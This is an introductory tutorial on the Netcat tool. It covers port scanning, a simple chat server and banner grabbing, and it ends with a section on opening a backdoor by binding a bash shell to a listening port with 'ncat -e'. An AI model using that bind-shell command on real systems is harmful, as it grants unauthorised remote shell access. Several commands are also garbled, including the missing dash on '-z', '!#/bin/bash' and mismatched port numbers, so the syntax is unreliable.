Netcat is a versatile networking tool that can be used for port scanning, port redirection, listening for incoming connections, and creating remote connections. It allows creating a simple command line chat server by running nc in listen mode on one system and connecting to it from another. Netcat can also identify services running on specific ports by obtaining port banners, and has been used by hackers to create backdoors by launching a shell on a listened port.
2. Netcat
• Netcat (or nc in short) is a simple yet powerful networking command-
line tool used for performing any operation in Linux related to TCP,
UDP, or UNIX-domain sockets.
• Netcat can be used for port scanning, port redirection, as a port
listener (for incoming connections); it can also be used to open
remote connections and so many other things. Besides, you can use it
as a backdoor to gain access to a target server.
3. Port Scanning
Netcat can be used for port scanning: to know which ports are open and
running services on a target machine. It can scan a single or multiple or a range
of open ports.
Here is an example, the -z option sets nc to simply scan for listening daemons,
without actually sending any data to them. The -v option enables verbose mode
and -w specifies a timeout for connection that can not be established.
$ nc -v -w 2 z 192.168.56.1 22 #scan a single port
OR
$ nc -v -w 2 z 192.168.56.1 22 80 #scan multiple ports
OR
$ nc -v -w 2 z 192.168.56.1 20-25 #scan range of ports
4. Create a Command Line Chat Server
You can also use Netcat to create a simple command-line messaging server
instantly. As in the previous usage example, nc must be installed on both
systems used for the chat room.
On one system, run the following command to create the chat server listening
on port 5000.
$ nc -l -vv -p 5000
On the other system, run the following command to launch a chat session to a
machine where the messaging server is running.
$ nc 192.168.56.1 5000
5. Find a Service Running on Port
You can also use Netcat to obtain port banners. In this case, it will tell
you what service is running behind a certain port. For example to know
what type of service is running behind port 22 on a specific server, run
the following command (replace 192.168.56.110 with the target
server’s IP address). The -n flag means to disable DNS or service
lookups.
$ nc -v -n 192.168.56.110 80
6. Create a Backdoor via nc
NC command can also be used to create backdoor to your systems and
and this technique is actually used by hackers a lot. To create a
backdoor, the command is,
$ ncat -l 1000 -e !#/bin/bash. "e" flag attaches a bash to port 10000.
Now a client can connect to port 10000 on server and will have
complete access to our system via bash.
$ncat 192.168.1.100 10000